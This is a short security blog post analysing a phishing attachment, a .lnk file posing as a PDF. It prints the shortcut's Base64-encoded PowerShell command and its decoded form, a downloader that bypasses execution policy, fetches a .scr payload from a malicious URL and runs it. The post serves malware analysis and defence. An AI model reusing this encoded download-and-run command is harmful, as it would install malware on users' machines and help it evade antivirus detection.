Simple malware downloader obfuscation with Powershell and Base64

Maybe i have reinvented the wheel…

…but i think is useful to share this discovery.

I recently had the opportunity to analyze an email with attached a link that downloads a suspicious file.

From a first analysis, it seemed be a .lnk file disguised as a PDF.

The .lnk files contains this command line:

powershell.exe -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAGMAbwBtAG0AYQBuAGQAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvAGEAbAB2AGEAcgBlAHoAYgBvAHIAagBhAC4AYwBvAG0ALwBqAGEAcwBoAGUAYgBjADUAdQBqAHAAcwBlAGQALwBwAG8AZABrAGoAZgBuAHYAYgAzAHMAaQBkAGoAZQAiACwAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAcABvAGwAZQAuAHMAYwByACIAIAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAHAAbwBsAGUALgBzAGMAcgAiACAAKQA=

the command uses the -EncodedCommand powershell parameter, that allows the execution of a Base64 encoded script:

-EncodedCommand
 Accepts a base-64-encoded string version of a command. Use this parameter
 to submit commands to Windows PowerShell that require complex quotation
 marks or curly braces.

Of course this technique is used to obfuscate the maliciou sscript and try to evade antivirus checks.

In fact, once decoded the Base64 string, we get this:

PowerShell -ExecutionPolicy bypass -noprofile -command (New-Object System.Net.WebClient).DownloadFile(“http://alvarezborja.com/jashebc5ujpsed/podkjfnvb3sidje", “$env:APPDATApole.scr” );Start-Process( “$env:APPDATApole.scr” )

A simple downloader that tries to get a payload from h[tt]p://alvarezborja[.]com/jashebc5ujpsed/podkjfnvb3sidje

Doing some research, I discovered that this technique is already used by a bit and is very well explained in this article by Symantec Connect:

https://www.symantec.com/connect/blogs/dark-power-windows-powershell

Windows PowerShell, the Microsoft scripting language, has made the headlines recently due to malware authors leveraging it for malicious purposes. Symantec has identified more PowerShell scripts being used for nefarious purposes in attacks.

References

 

Comments